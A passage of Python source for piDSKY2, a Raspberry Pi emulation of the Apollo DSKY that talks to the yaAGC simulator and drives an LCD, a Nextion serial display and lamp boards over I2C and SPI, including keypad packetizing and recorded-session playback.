ser_disp.write(b'r12.txt=""' + eof)
ser_disp.write(b'r13.txt=""' + eof)
ser_disp.write(b'r14.txt=""' + eof)
ser_disp.write(b'r15.txt=""' + eof)
ser_disp.write(b'r20.txt=""' + eof)
ser_disp.write(b'r21.txt=""' + eof)
ser_disp.write(b'r22.txt=""' + eof)
ser_disp.write(b'r23.txt=""' + eof)
ser_disp.write(b'r24.txt=""' + eof)
ser_disp.write(b'r25.txt=""' + eof)
ser_disp.write(b'r30.txt=""' + eof)
ser_disp.write(b'r31.txt=""' + eof)
ser_disp.write(b'r32.txt=""' + eof)
ser_disp.write(b'r33.txt=""' + eof)
ser_disp.write(b'r34.txt=""' + eof)
ser_disp.write(b'r35.txt=""' + eof)
ser_disp.flush()
homeDir = os.path.expanduser("~")
#print("Home = " + homeDir)
# Parse command-line arguments.
cli = argparse.ArgumentParser()
cli.add_argument("--host", help="Host address of yaAGC, defaulting to localhost.")
cli.add_argument("--port", help="Port for yaAGC, defaulting to 19798.", type=int)
cli.add_argument("--window", help="Use window rather than full screen for LCD.")
cli.add_argument("--slow", help="For use on really slow host systems.")
cli.add_argument("--pigpio", help="Use PIGPIO rather than led-panel for lamp control. The value is a brightness-intensity setting, 0-15.", type=int)
cli.add_argument("--record", help="Record all incoming i/o-channel data for later playback.")
cli.add_argument("--playback", help="Play back recorded i/o-channel data from selected filename.")
cli.add_argument("--lamptest", help="Perform a lamp test and then exit.")
cli.add_argument("--manual", help="Manually control the display.")
cli.add_argument("--gunmetal", help="Use gunmetal versions of mounting posts and horizontal separator.")
cli.add_argument("--backlights", help="Turn on key backlights at startup.")
args = cli.parse_args()
if args.backlights:
useBacklights = True
else:
useBacklights = False
initDisplay()
if args.manual:
os.system('clear')
print("Manual DSKY Instructions")
print("------------------------")
print("Area-selection mode:")
print(" RSET to exit.")
print(" PRO to select PROG area.")
print(" VERB to select VERB area.")
print(" NOUN to select NOUN area.")
print(" 1/2/3 to select R1/R2/R3.")
print(" + to select lamps.")
print(" - to select key-backlights.")
print(" CLR to toggle COMP ACTY.")
print("In numerical-entry mode (after choosing")
print("PRO, VERB, NOUN, 1, 2, or 3 in area-")
print("selection mode), use these keys:")
print(" +-0123456789 as usual for numbers")
print(" CLR for blank spaces")
print(" KEY REL to backspace")
print(" ENTR returns to area selection")
print(" RSET screenshot")
print(" PRO/VERB/NOUN also switch areas")
print("For lamp-editing mode, the 14 lamps are")
print("ordered ROW-WISE starting from the")
print("upper left to the lower right. For")
print("key-backlight mode, the keys are")
print("ordered COLUMN-WISE from upper left to")
print("lower right (19 total), plus 3 hidden")
print("lamps: VNC, TBD1, and TBD2. In either")
print("case, use these keys in these modes:")
print(" +- for ON and OFF")
print(" KEY REL to backspace")
print(" ENTR returns to area selection")
print(" RSET screenshot")
print(" PRO/VERB/NOUN also switch areas")
input("Hit ENTR to start ... ")
# Responsiveness settings.
if args.slow:
PULSE = 0.25
lampDeadtime = 0.25
else:
PULSE = 0.05
lampDeadtime = 0.1
# Characteristics of the host and port being used for yaAGC communications.
if args.host:
TCP_IP = args.host
else:
TCP_IP = 'localhost'
if args.port:
TCP_PORT = args.port
else:
TCP_PORT = 19798
if args.record:
lastRecordedTime = -1
recordingFile = open(homeDir + "/Desktop/piDSKY2-recorded.canned", "w", 1)
if args.playback:
useBacklights = False
lastPlaybackTime = time.time()
playbackEvents = []
currentPlaybackIndex = 0
try:
playbackFile = open(args.playback, "r")
playbackGenerator = (line.strip().split() for line in playbackFile)
# Loop on the input-file's lines.
for line in playbackGenerator:
# If we find a field that begins with the '#' character,
# we ignore all of the fields beyond it as constituting
# a comment.
for i in range(1, len(line)):
if line[i][:1] == '#':
line = line[:i]
break
# At minimum, we require at least 2 fields in the line:
# the first must be a float, and the
# second must not be empty.
if len(line) < 2 or len(line[1]) < 1:
continue
try:
differential = float(line[0])
except:
continue
# There are two cases at this
# point. First, the line could be an i/o-channel event, in
# which case it has 3 fields consisting of a float (already
# verified) and two octals. In the second, it consists of
# a variable number of fields, of which the first is a float
# (already verified), the second is non-empty (and consists
# of the name of a program to be run), and the remainder (if
# any) are the command-line parameters for that program.
# When we append this to the event array, we distinguish by adding
# an extra field that is either True for the former case or
# False for the latter.
entry = ()
if len(line) == 3:
try:
entry = ( True, differential, int(line[1], 8), int(line[2], 8) )
except:
pass
if len(entry) == 0:
command = line[1];
for i in range(2, len(line)):
command += " " + line[i]
entry = ( False, differential, command )
playbackEvents.append( entry )
#print(str(playbackEvents[len(playbackEvents)-1]))
except:
print("Problem with playback file: " + args.playback)
time.sleep(2)
echoOn(True)
os._exit(1)
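# For reference, a playback file as parsed above consists of lines of the form
# "<differential> <octal channel> <octal value>" for i/o-channel events, or
# "<differential> <shell command ...>" for commands run in the background, where the
# differential is a time offset (the --record feature writes integer milliseconds)
# and '#' comments are permitted.  A purely hypothetical example file:
#   # sample piDSKY2 playback script
#   0 11 2                        # channel 011 event
#   500 10 55243                  # channel 010 event 500 ms later
#   1000 aplay /home/pi/ding.wav  # arbitrary shell command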
# Set up root viewport for tkinter graphics
root = Tk()
if args.window:
root.geometry('272x480+0+0')
root.title("piDSKY2")
else:
root.attributes('-fullscreen', True)
root.config(cursor="none")
root.configure(background='black')
# Preload images to make it go faster later.
imageDigitBlank = PhotoImage(file="piDSKY2-images/7Seg-0.gif")
imageDigit0 = PhotoImage(file="piDSKY2-images/7Seg-21.gif")
imageDigit1 = PhotoImage(file="piDSKY2-images/7Seg-3.gif")
imageDigit2 = PhotoImage(file="piDSKY2-images/7Seg-25.gif")
imageDigit3 = PhotoImage(file="piDSKY2-images/7Seg-27.gif")
imageDigit4 = PhotoImage(file="piDSKY2-images/7Seg-15.gif")
imageDigit5 = PhotoImage(file="piDSKY2-images/7Seg-30.gif")
imageDigit6 = PhotoImage(file="piDSKY2-images/7Seg-28.gif")
imageDigit7 = PhotoImage(file="piDSKY2-images/7Seg-19.gif")
imageDigit8 = PhotoImage(file="piDSKY2-images/7Seg-29.gif")
imageDigit9 = PhotoImage(file="piDSKY2-images/7Seg-31.gif")
imageCompActyOff = PhotoImage(file="piDSKY2-images/CompActyOff.gif")
imageCompActyOn = PhotoImage(file="piDSKY2-images/CompActyOn.gif")
imageMinusOn = PhotoImage(file="piDSKY2-images/MinusOn.gif")
imagePlusOn = PhotoImage(file="piDSKY2-images/PlusOn.gif")
imagePlusMinusOff = PhotoImage(file="piDSKY2-images/PlusMinusOff.gif")
imageProgOn = PhotoImage(file="piDSKY2-images/ProgOn.gif")
imageVerbOn = PhotoImage(file="piDSKY2-images/VerbOn.gif")
imageNounOn = PhotoImage(file="piDSKY2-images/NounOn.gif")
if args.gunmetal:
imageSeparatorOn = PhotoImage(file="piDSKY2-images/SeparatorOn.gif")
imageSeparatorOff = PhotoImage(file="piDSKY2-images/SeparatorOn.gif")
imageDot = PhotoImage(file="piDSKY2-images/Dot.gif")
else:
imageSeparatorOn = PhotoImage(file="piDSKY2-images/SeparatorOn-gunmetal.gif")
imageSeparatorOff = PhotoImage(file="piDSKY2-images/SeparatorOff-gunmetal.gif")
imageDot = PhotoImage(file="piDSKY2-images/Dot-gunmetal.gif")
# Initial placement of all graphical objects on LCD panel.
widgetStates = {}
widgetLabels = {}
def displayGraphic(x, y, img):
global widgetStates, widgetLabels
hmiObj = ''
hmiValue = ''
#convert x,y coordinates into corresponding object names from the HMI file (Vlad Mihailescu)
if x == 172 and y == 36: hmiObj = 'p0'
elif x == 222 and y == 36: hmiObj = 'p1'
elif x == 0 and y == 149: hmiObj = 'v0'
elif x == 50 and y == 149: hmiObj = 'v1'
elif x == 172 and y == 149: hmiObj = 'n0'
elif x == 222 and y == 149: hmiObj = 'n1'
elif x == 0 and y == 238: hmiObj = 'r10'
elif x == 22 and y == 238: hmiObj = 'r11'
elif x == 72 and y == 238: hmiObj = 'r12'
elif x == 122 and y == 238: hmiObj = 'r13'
elif x == 172 and y == 238: hmiObj = 'r14'
elif x == 222 and y == 238: hmiObj = 'r15'
elif x == 0 and y == 328: hmiObj = 'r20'
elif x == 22 and y == 328: hmiObj = 'r21'
elif x == 72 and y == 328: hmiObj = 'r22'
elif x == 122 and y == 328: hmiObj = 'r23'
elif x == 172 and y == 328: hmiObj = 'r24'
elif x == 222 and y == 328: hmiObj = 'r25'
elif x == 0 and y == 418: hmiObj = 'r30'
elif x == 22 and y == 418: hmiObj = 'r31'
elif x == 72 and y == 418: hmiObj = 'r32'
elif x == 122 and y == 418: hmiObj = 'r33'
elif x == 172 and y == 418: hmiObj = 'r34'
elif x == 222 and y == 418: hmiObj = 'r35'
elif x == 0 and y == 212: hmiObj = 'l1'
elif x == 0 and y == 302: hmiObj = 'l2'
elif x == 0 and y == 392: hmiObj = 'l3'
#convert corresponding image files into values to be displayed on the HMI (Vlad Mihailescu)
if img == imageDigit0: hmiValue = '"0"'
elif img == imageDigit1: hmiValue = '"1"'
elif img == imageDigit2: hmiValue = '"2"'
elif img == imageDigit3: hmiValue = '"3"'
elif img == imageDigit4: hmiValue = '"4"'
elif img == imageDigit5: hmiValue = '"5"'
elif img == imageDigit6: hmiValue = '"6"'
elif img == imageDigit7: hmiValue = '"7"'
elif img == imageDigit8: hmiValue = '"8"'
elif img == imageDigit9: hmiValue = '"9"'
elif img == imageDigitBlank: hmiValue = '""'
elif img == imageMinusOn: hmiValue = '"-"'
elif img == imagePlusOn: hmiValue = '"+"'
elif img == imagePlusMinusOff: hmiValue = '""'
elif img == imageSeparatorOff: hmiValue = '""'
elif img == imageSeparatorOn: hmiValue = '24544'
key = str(x) + "," + str(y)
if key in widgetStates:
if widgetStates[key] is img:
#print("skipping " + key)
return
widgetStates[key] = img
if key in widgetLabels:
widgetLabels[key].destroy()
widgetLabels[key] = Label(root, image=img, borderwidth=0, highlightthickness=0)
widgetLabels[key].place(x=x, y=y)
#write serial bytes to Nextion HMI encoded in iso-8859-1 aka latin_1 (Vlad Mihailescu)
if img == imageCompActyOn: ser_disp.write(b'cal.bco=' + turnON + eof)
elif img == imageCompActyOff: ser_disp.write(b'cal.bco=' + turnOFF + eof)
elif img == imageSeparatorOn: ser_disp.write((hmiObj + '.pco=' + hmiValue + '\xff\xff\xff').encode('latin_1'))
elif img == imageSeparatorOff: ser_disp.write((hmiObj + '.pco=33808\xff\xff\xff').encode('latin_1'))
elif x == 0 and y == 212 and img == imageSeparatorOff: ser_disp.write(('l1.pco=23243\xff\xff\xff').encode('latin_1'))
else: ser_disp.write((hmiObj + '.txt=' + hmiValue + '\xff\xff\xff').encode('latin_1'))
ser_disp.flush()
topDot = 15
dotSpacing = 92
topProg = 36
topVN = 149
topR1 = 238
topR2 = 328
topR3 = 418
signWidth = 22
digitWidth = 50
colSign = 0
colDot = 133
colPN = 172
colD1 = colSign + signWidth
colD2 = colD1 + digitWidth
colD3 = colD2 + digitWidth
colD4 = colD3 + digitWidth
colD5 = colD4 + digitWidth
displayGraphic(colDot, topDot, imageDot)
displayGraphic(colDot, topDot + dotSpacing, imageDot)
displayGraphic(colDot, topDot + 2 * dotSpacing, imageDot)
displayGraphic(colPN, 0, imageProgOn)
displayGraphic(0, 113, imageVerbOn)
displayGraphic(colPN, 113, imageNounOn)
displayGraphic(0, 212, imageSeparatorOn)
displayGraphic(0, 302, imageSeparatorOff)
displayGraphic(0, 392, imageSeparatorOff)
###################################################################################################
# Stuff related to control of the lamp board via I2C (smbus) on the Pi's GPIO (Vlad Mihailescu)
import smbus
# Initialize the I2C (SMBus) interface.
DEVICE_BUS = 1
DEVICE_ADDR = 0x11
bus = smbus.SMBus(DEVICE_BUS)
def StringToBytes(val):
retVal = []
for c in val:
retVal.append(ord(c))
return retVal
# Writes to a register of the LED driver chip via the I2C bus.
def writeI2c(value):
bus.write_byte(DEVICE_ADDR,value)
def writeI2cByte(value):
byteVal = StringToBytes(value)
bus.write_i2c_block_data(DEVICE_ADDR,0x00,byteVal)
return -1
###################################################################################
# Stuff related to control of the lamp board via PIGPIO and SPI on the Pi's GPIO.
# Initialize the PIGPIO API. Note that the LED-driver chip we're going to
# interface to has a 10 Mbaud SPI bus, and the PIGPIO docs indicate that
# the SPI bus probably won't work above 30 Mbaud, so 10 Mbaud is probably
# okay. I arbitrarily cut this down to 100K, but an optimal setting should
# perhaps be determined empirically.
gpio = ""
spiHandle = -1
spiChannel = 0
spiBaud = 100000
spiErrorMessageWaitTime = 3
# Writes to a register of the LED driver chip via the SPI bus. The
# register address is 0..15, and the value is 0..255.
def writeSpi(address, value):
global gpio, spiHandle
gpio.spi_write(spiHandle, [ address, value ])
def shutdownGPIO():
if args.pigpio:
global spiHandle, gpio
if spiHandle >= 0:
gpio.spi_close(spiHandle)
spiHandle = -1
if gpio != "":
gpio.stop()
gpio = ""
import atexit
atexit.register(shutdownGPIO)
if args.pigpio:
import pigpio
gpio = pigpio.pi()
if not gpio.connected:
sys.stderr.write("Cannot connect to PIGPIO server.\n")
time.sleep(spiErrorMessageWaitTime)
os._exit(1)
spiHandle = gpio.spi_open(spiChannel, spiBaud, 0x0000) # CE0, main SPI device, mode 0.
if spiHandle < 0:
sys.stderr.write("Cannot open SPI channel.\n")
time.sleep(spiErrorMessageWaitTime)
if gpio != "":
gpio.stop()
gpio = ""
os._exit(1)
# Set up the LED-driver chip.
for i in range(1, 9):
writeSpi(i, 0) # The initial settings of the "digits".
writeSpi(9, 0) # No BCD decoding.
writeSpi(10, int(args.pigpio)) # Brightness-PWM setting, 0..15.
writeSpi(11, 7) # All 8 digits are controlled.
writeSpi(12, 1) # Not in shut-down mode.
# Simply a test of the display and the code above,
# using the chip's display-test function.
if False:
print("SPI test ...")
for i in range(0, 10):
print("On " + str(i))
writeSpi(15, 1)
time.sleep(1)
print("Off " + str(i))
writeSpi(15, 0)
time.sleep(1)
print("SPI test completed.")
###################################################################################
# Some utilities I happen to use in my sample hardware abstraction functions, but
# not of value outside of that, unless you happen to be implementing DSKY functionality
# in a similar way.
# Given a 3-tuple (channel,value,mask), creates packet data and sends it to yaAGC.
def packetize(tuple):
if args.playback:
return
outputBuffer = bytearray(4)
# First, create and output the mask command.
outputBuffer[0] = 0x20 | ((tuple[0] >> 3) & 0x0F)
outputBuffer[1] = 0x40 | ((tuple[0] << 3) & 0x38) | ((tuple[2] >> 12) & 0x07)
outputBuffer[2] = 0x80 | ((tuple[2] >> 6) & 0x3F)
outputBuffer[3] = 0xC0 | (tuple[2] & 0x3F)
s.send(outputBuffer)
# Now, the actual data for the channel.
outputBuffer[0] = 0x00 | ((tuple[0] >> 3) & 0x0F)
outputBuffer[1] = 0x40 | ((tuple[0] << 3) & 0x38) | ((tuple[1] >> 12) & 0x07)
outputBuffer[2] = 0x80 | ((tuple[1] >> 6) & 0x3F)
outputBuffer[3] = 0xC0 | (tuple[1] & 0x3F)
s.send(outputBuffer)
if args.record:
global lastRecordedTime, recordingFile, lastInputChannels
currentTime = time.time()
if lastRecordedTime < 0:
lastRecordedTime = currentTime
try:
channelName = oct(tuple[0])
if not (channelName in lastInputChannels) or lastInputChannels[channelName] != tuple[1]:
lastInputChannels[channelName] = tuple[1]
recordingFile.write(str(round(1000 * (currentTime - lastRecordedTime)))
+ " " + ("%o" % tuple[0]) + " " + ("%o" % tuple[1]) + "\n")
lastRecordedTime = currentTime
except:
pass
lastRecordedTime = currentTime
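# Worked example (illustrative, following the bit-packing above): a call like
#   packetize( (0o15, 0o31, 0o37) )
# i.e. channel 015, value 031, mask 037, first sends the 4-byte mask command
#   0x21 0x68 0x80 0xDF
# and then the 4-byte data command
#   0x01 0x68 0x80 0xD9
# Each byte carries a signature in its two most-significant bits (00, 01, 10, 11 for
# bytes 1..4), bit 0x20 of the first byte marks a mask command, and the remaining
# bits hold the 7-bit channel number and the 15-bit value split across the packet.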
# This particular function parses various keystrokes, like '0' or 'V' and creates
# packets as if they were DSKY keypresses. It should be called occasionally as
# parseDskyKey(0) if there are no keystrokes, in order to make sure that the PRO
# key gets released.
# The return value of this function is
# a list ([...]), of which each element is a 3-tuple consisting of an AGC channel
# number, a value for that channel, and a bitmask that tells which bit-positions
# of the value are valid. The returned list can be empty. For example, a
# return value of
# [ ( 0o15, 0o31, 0o37 ) ]
# would indicate that the lowest 5 bits of channel 15 (octal) were valid, and that
# the value of those bits were 11001 (binary), which collectively indicate that
# the KEY REL key on a DSKY is pressed.
resetCount = 0
# stateV35E and countV35E are some instrumentation for printing out a count of how
# many times V35E has been used. It is solely for debugging.
stateV35E = 0
countV35E = 0
def parseDskyKey(ch):
global resetCount
global stateV35E, countV35E
if ch == 'R':
resetCount += 1
if resetCount >= 5:
print("Exiting ...")
return ""
elif ch != "":
resetCount = 0
returnValue = []
relatedToV35E = False
if ch == '0':
returnValue.append( (0o15, 0o20, 0o37) )
elif ch == '1':
returnValue.append( (0o15, 0o1, 0o37) )
elif ch == '2':
returnValue.append( (0o15, 0o2, 0o37) )
elif ch == '3':
returnValue.append( (0o15, 0o3, 0o37) )
if stateV35E == 1:
relatedToV35E = True
stateV35E = 2
elif ch == '4':
returnValue.append( (0o15, 0o4, 0o37) )
elif ch == '5':
returnValue.append( (0o15, 0o5, 0o37) )
if stateV35E == 2:
relatedToV35E = True
stateV35E = 3
elif ch == '6':
returnValue.append( (0o15, 0o6, 0o37) )
elif ch == '7':
returnValue.append( (0o15, 0o7, 0o37) )
elif ch == '8':
returnValue.append( (0o15, 0o10, 0o37) )
elif ch == '9':
returnValue.append( (0o15, 0o11, 0o37) )
elif ch == '+':
returnValue.append( (0o15, 0o32, 0o37) )
elif ch == '-':
returnValue.append( (0o15, 0o33, 0o37) )
elif ch == 'V':
returnValue.append( (0o15, 0o21, 0o37) )
relatedToV35E = True
stateV35E = 1
elif ch == 'N':
returnValue.append( (0o15, 0o37, 0o37) )
elif ch == 'R':
returnValue.append( (0o15, 0o22, 0o37) )
elif ch == 'C':
returnValue.append( (0o15, 0o36, 0o37) )
elif ch == 'P':
returnValue.append( (0o32, 0o00000, 0o20000) )
elif ch == 'p' or ch == 'PR':
returnValue.append( (0o32, 0o20000, 0o20000) )
elif ch == 'K':
returnValue.append( (0o15, 0o31, 0o37) )
elif ch == '\n' or ch == 'E':
returnValue.append( (0o15, 0o34, 0o37) )
if stateV35E == 3:
countV35E += 1
sys.stderr.write("V35E count = " + str(countV35E) + "\n")
else:
relatedToV35E = True
if not relatedToV35E:
stateV35E = 0
return returnValue
# This function turns keyboard echo on or off.
def echoOn(control):
fd = sys.stdin.fileno()
new = termios.tcgetattr(fd)
if control:
print("Keyboard echo on")
new[3] |= termios.ECHO
else:
print("Keyboard echo off")
new[3] &= ~termios.ECHO
termios.tcsetattr(fd, termios.TCSANOW, new)
echoOn(False)
# Get a screenshot.
def screenshot(name):
global args
print("Creating screenshot ...")
img = grab(bbox=(0, 0, 272, 480))
img.save(name)
print("Screenshot saved as " + name);
# This function is a non-blocking read of a single character from the
# keyboard. Returns either the key value (such as '0' or 'V'), or else
# the value "" if no key was pressed.
def get_char_keyboard_nonblock():
fd = sys.stdin.fileno()
oldterm = termios.tcgetattr(fd)
newattr = termios.tcgetattr(fd)
newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO
termios.tcsetattr(fd, termios.TCSANOW, newattr)
oldflags = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, oldflags | os.O_NONBLOCK)
c = ""
try:
c = sys.stdin.read(1)
except IOError: pass
termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)
fcntl.fcntl(fd, fcntl.F_SETFL, oldflags)
return c
###################################################################################
# Hardware abstraction / User-defined functions. Also, any other platform-specific
# initialization.
# This function is automatically called periodically by the event loop to check for
# conditions that will result in sending messages to yaAGC that are interpreted
# as changes to bits on its input channels. For test purposes, it simply polls the
# keyboard, and interprets various keystrokes as DSKY keys if present. The return
# value is supposed to be a list of 3-tuples of the form
# [ (channel0,value0,mask0), (channel1,value1,mask1), ...]
# and may be an empty list. The list guiKey is used to queue up keypresses (or
# relevant key releases) from the graphics window, so that they can be properly
# merged in with keystrokes from the console, without losing any of them.
guiKey = []
def getKey():
global guiKey
if len(guiKey) == 0:
ch = get_char_keyboard_nonblock()
else:
ch = guiKey.pop(0)
ch = ch.upper()
if ch == '_':
ch = '-'
elif ch == '=':
ch = '+'
return ch
def inputsForAGC():
returnValue = parseDskyKey(getKey())
if len(returnValue) > 0:
print("Sending to yaAGC: " + oct(returnValue[0][1]) + "(mask " + oct(returnValue[0][2]) + ") -> channel " + oct(returnValue[0][0]))
return returnValue
# Capture any keypress events from the LCD window.
# Many need to be translated for shifting, or due to being
# from the numeric keypad.
guiKeyTranslations = []
guiKeyTranslations.append(("Return", "\n"))
guiKeyTranslations.append(("KP_Enter", "\n"))
guiKeyTranslations.append(("equal", "+"))
guiKeyTranslations.append(("plus", "+"))
guiKeyTranslations.append(("KP_Add", "+"))
guiKeyTranslations.append(("minus", "-"))
guiKeyTranslations.append(("underscore", "-"))
guiKeyTranslations.append(("KP_Subtract", "-"))
guiKeyTranslations.append(("slash", "V"))
guiKeyTranslations.append(("KP_Divide", "V"))
guiKeyTranslations.append(("asterisk", "N"))
guiKeyTranslations.append(("KP_Multiply", "N"))
guiKeyTranslations.append(("Delete", "C"))
guiKeyTranslations.append(("KP_Decimal", "C"))
guiKeyTranslations.append(("KP_Delete", "C"))
guiKeyTranslations.append(("BackSpace", "P"))
guiKeyTranslations.append(("KP_0", "0"))
guiKeyTranslations.append(("KP_Insert", "0"))
guiKeyTranslations.append(("KP_1", "1"))
guiKeyTranslations.append(("KP_End", "1"))
guiKeyTranslations.append(("KP_2", "2"))
guiKeyTranslations.append(("KP_Down", "2"))
guiKeyTranslations.append(("KP_3", "3"))
guiKeyTranslations.append(("KP_Next", "3"))
guiKeyTranslations.append(("KP_4", "4"))
guiKeyTranslations.append(("KP_Left", "4"))
guiKeyTranslations.append(("KP_5", "5"))
guiKeyTranslations.append(("KP_Begin", "5"))
guiKeyTranslations.append(("KP_6", "6"))
guiKeyTranslations.append(("KP_Right", "6"))
guiKeyTranslations.append(("KP_7", "7"))
guiKeyTranslations.append(("KP_Home", "7"))
guiKeyTranslations.append(("KP_8", "8"))
guiKeyTranslations.append(("KP_Up", "8"))
guiKeyTranslations.append(("KP_9", "9"))
guiKeyTranslations.append(("KP_Prio", "9"))
debugKey = ""
def guiKeypress(event):
global guiKey, debugKey, guiKeyTranslations
if event.keysym == "Num_Lock":
# Pressing the NUM LOCK key turns key-repeat back on.
# So let's undo that.
os.system("xset r off &")
debugKey = event.keysym
for i in range(0, len(guiKeyTranslations)):
if debugKey == guiKeyTranslations[i][0]:
guiKey.append(guiKeyTranslations[i][1])
return
guiKey.append(debugKey)
def guiKeyrelease(event):
global guiKey
if event.keysym == 'p' or event.keysym == 'P' or event.keysym == "BackSpace":
guiKey.append("PR")
root.bind_all('<KeyPress>', guiKeypress)
root.bind_all('<KeyRelease>', guiKeyrelease)
# The tab key isn't captured by the stuff above.
def tabKeypress(event):
global guiKey, debugKey
debugKey = "Tab"
guiKey.append("K")
root.bind_all('<Tab>', tabKeypress)
os.system("xset r off &")
# Converts a 5-bit code in channel 010 to " ", "0", ..., "9".
def codeToString(code):
if code == 0:
return " ", imageDigitBlank
elif code == 21:
return "0", imageDigit0
elif code == 3:
return "1", imageDigit1
elif code == 25:
return "2", imageDigit2
elif code == 27:
return "3", imageDigit3
elif code == 15:
return "4", imageDigit4
elif code == 30:
return "5", imageDigit5
elif code == 28:
return "6", imageDigit6
elif code == 19:
return "7", imageDigit7
elif code == 29:
return "8", imageDigit8
elif code == 31:
return "9", imageDigit9
return "?", imageDigitBlank
def displaySign(x, y, state):
if state == 1:
displayGraphic(x, y, imagePlusOn)
elif state == 2:
displayGraphic(x, y, imageMinusOn)
else:
displayGraphic(x, y, imagePlusMinusOff)
# For flashing verb/noun area.
vnFlashing = False
vnTimer = ""
vnCurrentlyOn = True
vnImage1 = imageDigitBlank
vnImage2 = imageDigitBlank
vnImage3 = imageDigitBlank
vnImage4 = imageDigitBlank
def vnFlashingHandler():
global vnFlashing, vnTimer, vnCurrentlyOn, vnImage1, vnImage2, vnImage3, vnImage4
if vnFlashing:
vnCurrentlyOn = not vnCurrentlyOn
if vnCurrentlyOn:
displayGraphic(0, topVN, vnImage1)
displayGraphic(digitWidth, topVN, vnImage2)
displayGraphic(colPN, topVN, vnImage3)
displayGraphic(colPN + digitWidth, topVN, vnImage4)
#Nextion VERB, NOUN digits flash on (Vlad Mihailescu)
ser_disp.write(b'v0.pco=' + turnON + eof)
ser_disp.write(b'v1.pco=' + turnON + eof)
ser_disp.write(b'n0.pco=' + turnON + eof)
ser_disp.write(b'n1.pco=' + turnON + eof)
else:
displayGraphic(0, topVN, imageDigitBlank)
displayGraphic(digitWidth, topVN, imageDigitBlank)
displayGraphic(colPN, topVN, imageDigitBlank)
displayGraphic(colPN + digitWidth, topVN, imageDigitBlank)
#Nextion VERB, NOUN digits flash off (Vlad Mihailescu)
ser_disp.write(b'v0.pco=' + turnOFF + eof)
ser_disp.write(b'v1.pco=' + turnOFF + eof)
ser_disp.write(b'n0.pco=' + turnOFF + eof)
ser_disp.write(b'n1.pco=' + turnOFF + eof)
vnTimer = threading.Timer(0.75, vnFlashingHandler)
vnTimer.start()
def vnFlashingStop():
global vnFlashing, vnTimer, vnCurrentlyOn, vnImage1, vnImage2, vnImage3, vnImage4
if vnFlashing:
vnTimer.cancel()
displayGraphic(0, topVN, vnImage1)
displayGraphic(digitWidth, topVN, vnImage2)
displayGraphic(colPN, topVN, vnImage3)
displayGraphic(colPN + digitWidth, topVN, vnImage4)
#Nextion VERB, NOUN digits flash off (Vlad Mihailescu)
ser_disp.write(b'v0.pco=' + turnON + eof)
ser_disp.write(b'v1.pco=' + turnON + eof)
ser_disp.write(b'n0.pco=' + turnON + eof)
ser_disp.write(b'n1.pco=' + turnON + eof)
vnFlashing = False
# The following dictionary gives, for each controllable lighting element (indicator lamps
# and key backlights mostly):
# Whether or not it is currently lit.
# Command-line parameters for the shell function 'led-panel' to turn on that lamp.
# A list of registers and bit-masks (for the registers) for an LED-driver chip
# connected to the Pi via the SPI bus for turning that lamp.
# The hardware assumption is that there is a MAX7219 7-segment LED controller chip,
# which is a device that controls 8 7-segment(+decimal point) displays, thus
# controlling 64 individual LEDs. These are arranged as "DIGIT0" through "DIGIT7",
# controlled by chip registers 1 through 8. Within an individual chip register,
# the display segments are (from MSB to LSB)
# DP a b c d e f g
# Thus to indicate which LEDs a given lighting element is associated with, we only
# have to list the chip registers and bit masks within the register those lighting
# elements are associated with. Both these chip parameters and command-line parameters
# for the external program 'led-panel' are given. Which of the two sets of parameters
# ends up being used is dependent on the --pigpio command-line parameter.
lampStatuses = {
"UPLINK ACTY" : { "isLit" : False, "cliParameter" : "3", "spiParameters" : [ { "register":1, "mask":0x70 } ] },
"TEMP" : { "isLit" : False, "cliParameter" : "2", "spiParameters" : [ { "register":1, "mask":0x07 } ] },
"NO ATT" : { "isLit" : False, "cliParameter" : "5", "spiParameters" : [ { "register":2, "mask":0x70 } ] },
"GIMBAL LOCK" : { "isLit" : False, "cliParameter" : "4", "spiParameters" : [ { "register":2, "mask":0x07 } ] },
"DSKY STANDBY" : { "isLit" : False, "cliParameter" : "7", "spiParameters" : [ { "register":3, "mask":0x70 } ] },
"PROG" : { "isLit" : False, "cliParameter" : "6", "spiParameters" : [ { "register":3, "mask":0x07 } ] },
"KEY REL" : { "isLit" : False, "cliParameter" : "B", "spiParameters" : [ { "register":4, "mask":0x70 } ] },
"RESTART" : { "isLit" : False, "cliParameter" : "8", "spiParameters" : [ { "register":4, "mask":0x07 } ] },
"OPR ERR" : { "isLit" : False, "cliParameter" : "9", "spiParameters" : [ { "register":5, "mask":0x70 } ] },
"TRACKER" : { "isLit" : False, "cliParameter" : "A", "spiParameters" : [ { "register":5, "mask":0x07 } ] },
"PRIO DSP" : { "isLit" : False, "cliParameter" : "D", "spiParameters" : [ { "register":6, "mask":0x70 } ] },
"ALT" : { "isLit" : False, "cliParameter" : "C", "spiParameters" : [ { "register":6, "mask":0x07 } ] },
"NO DAP" : { "isLit" : False, "cliParameter" : "F", "spiParameters" : [ { "register":7, "mask":0x70 } ] },
"VEL" : { "isLit" : False, "cliParameter" : "E", "spiParameters" : [ { "register":7, "mask":0x07 } ] },
"VERB KEY" : { "isLit" : useBacklights, "cliParameter" : "G", "spiParameters" : [ { "register":1, "mask":0x08 } ] },
"NOUN KEY" : { "isLit" : useBacklights, "cliParameter" : "H", "spiParameters" : [ { "register":1, "mask":0x80 } ] },
"+ KEY" : { "isLit" : useBacklights, "cliParameter" : "I", "spiParameters" : [ { "register":2, "mask":0x08 } ] },
"- KEY" : { "isLit" : useBacklights, "cliParameter" : "J", "spiParameters" : [ { "register":2, "mask":0x80 } ] },
"0 KEY" : { "isLit" : useBacklights, "cliParameter" : "K", "spiParameters" : [ { "register":3, "mask":0x08 } ] },
"7 KEY" : { "isLit" : useBacklights, "cliParameter" : "L", "spiParameters" : [ { "register":3, "mask":0x80 } ] },
"4 KEY" : { "isLit" : useBacklights, "cliParameter" : "M", "spiParameters" : [ { "register":4, "mask":0x08 } ] },
"1 KEY" : { "isLit" : useBacklights, "cliParameter" : "N", "spiParameters" : [ { "register":4, "mask":0x80 } ] },
"8 KEY" : { "isLit" : useBacklights, "cliParameter" : "O", "spiParameters" : [ { "register":5, "mask":0x08 } ] },
"5 KEY" : { "isLit" : useBacklights, "cliParameter" : "P", "spiParameters" : [ { "register":5, "mask":0x80 } ] },
"2 KEY" : { "isLit" : useBacklights, "cliParameter" : "Q", "spiParameters" : [ { "register":6, "mask":0x08 } ] },
